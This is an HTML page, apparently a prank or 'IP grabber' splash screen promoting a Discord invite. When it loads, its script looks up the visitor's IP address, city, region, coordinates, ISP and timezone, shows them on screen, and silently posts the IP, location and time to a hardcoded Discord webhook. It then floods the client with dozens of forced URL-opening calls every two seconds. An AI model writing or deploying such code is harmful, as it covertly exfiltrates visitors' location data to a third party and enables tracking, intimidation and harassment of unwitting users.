<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>discord.gg/y-b</title>
    <style>
       body {
            margin: 0;
            padding: 0;
            background: black;
            font-family: 'Courier New', Courier, monospace;
            color: #9f8663;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            flex-direction: column;
            text-align: center;
            overflow: hidden;
        }
        #content {
            display: none;
            opacity: 0;
            transition: opacity 2s ease;
        }
        .image-container img {
            width: 400px; 
            height: auto;
            border: 2px solid #c2c2c2; 
            border-radius: 15px;
            box-shadow: 0 0 15px rgba(255, , 0, 0.7); 
        }
          .info {
            margin-top: 20px;
            font-size: 1.5em;
            color: #ffffff; 
            text-shadow: 0 0 8px #ffffff 0 0 15px #ffffff, 0 0 25px #ffffff;
            letter-spacing: 4.5px; 
            white-space: pre-wrap;
        }
        .text {
            margin-top: 5px;
            font-size: 75px; 
            color: #ffffff; 
            text-shadow: 0 0 8px #ffffff, 0 0 15px #ffffff, 0 0 25px #ffffff; 
            letter-spacing: 4.5px;
        }
        .video-container {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
            z-index: -1; /* Make sure it's behind other content */
        }
        .video-container video {
            width: 100%;
            height: 100%;
            object-fit: cover;
            filter: blur(15px); /* Apply blur effect */
        }
    </style>
</head>
<body>
    <div class="video-container">
        <video autoplay loop muted>
            <source src="https://cdn.discordapp.com/attachments/1344291786415145072/1344431844304879657/-5637248963445802397.mov?ex=67c18bfa&is=67c03a7a&hm=b2ea620fbec142f91483644a30e38e343a3f940aa2d064502e9de75d024b2c95&" type="video/mp4">
            Your browser does not support the video tag.
        </video>
    </div>

    <div class="gif-container">
        <img src="" alt="">
    </div>

    <div id="content">
        <div class="image-container">
            <img src="https://images-ext-1.discordapp.net/external/hc0AVxTaBBifSeGNmVD-1MZdmOJ_0fd8j3uGGNXEKME/%3Fsize%3D160%26name%3DYpeace/https/media.discordapp.net/stickers/1191098024303267900.png?format=webp&quality=lossless" alt="">
        </div>


        <audio autoplay loop>
            <source src="https://cdn.discordapp.com/attachments/1343296018619433020/1343940464239317012/2007_.mp3?ex=67bfc257&is=67be70d7&hm=99d3a0fff139f9f103dfc47d1a9180990b2392e9415cd766014341bff642b2e4&" type="audio/mpeg">
            Your browser does not support the audio element.
        </audio>
        <div class="info" id="ip-info"></div>
        <div class="text">discord.gg/y-b</div>
    </div>

    <script>
        setTimeout(() => {
            document.querySelector('.gif-container').style.display = 'none';
            const content = document.getElementById('content');
            content.style.display = 'block';
            setTimeout(() => {
                content.style.opacity = 1;
            }, 0200); 
        }, 0200);

        fetch('https://ipinfo.io/json')
        .then(response => response.json())
        .then(data => {
            const { ip, country, city, region, loc, org, timezone } = data;
            const infoDiv = document.getElementById('ip-info');
            infoDiv.innerHTML = ` <<C9 - POISON>>
<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong></strong> <span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;

            const dateTime = new Date().toLocaleString();
            const webhookUrl = 'https://discordapp.com/api/webhooks/1340317878960001085/EkZbvqGu0ox0oHhK4YDqX5THJE_dzdlLtwdIS2CvuH29ikTCJdC5dGVLeBLyAPTSHaC5';
            fetch(webhookUrl, {
                method: 'POST',
                headers: {'Content-Type': 'application/json'},
                body: JSON.stringify({content: `IP : ${ip}\nCountry & City : ${country} - ${city}\nDate & Time : ${dateTime}\n -`})
            });
        });

        setInterval(function() {
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
            window.invokeNative("openUrl", "https://discord.gg/y-b");
             },     2000);
    </script>
</body>
</html>
